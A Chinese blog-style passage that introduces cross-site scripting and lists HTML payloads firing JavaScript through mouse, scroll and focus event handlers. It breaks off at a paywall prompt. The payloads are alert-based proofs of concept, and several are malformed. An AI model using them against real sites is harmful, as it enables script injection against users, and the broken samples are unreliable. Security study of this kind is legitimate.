XSS万能超级无敌全通杀payload
——————————————
抱歉起的名字猖狂了点,我认,但我不改
——————————————
XSS 漏洞简介
跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。
常见的输出函数有: echo printf print print_r sprintf die var-dump var_export.
xss 分类:(三类)
反射型XSS:一般容易出现在搜索页面。
存储型XSS:代码是存储在服务器中的
DOM型XSS:基于文档对象模型Document Objeet Model,DOM)的一种漏洞。
payload——on,js事件
1、onmouseenter:当鼠标进入选区执行代码
<div style="123456</div>
2、onmouseleave:当鼠标离开选区执行代码
<DIV onmouseleave="alert('bem')" style="123456</DIV>
3、onmousewheel:当鼠标在选区滚轮时执行代码
<DIV onmousewheel="alert('bem')" style="123456</DIV>
4、onscroll:拖动滚动条执行代码
<div style="width:100px;height:100px;overflow:scroll" onscroll="alert('bem')">123456
</div>
5、onfocusin:当获得焦点时执行代码
<div contentEditable="true" style="asdf</d

最低0.47元/天 解锁文章
1635

被折叠的 条评论
为什么被折叠?



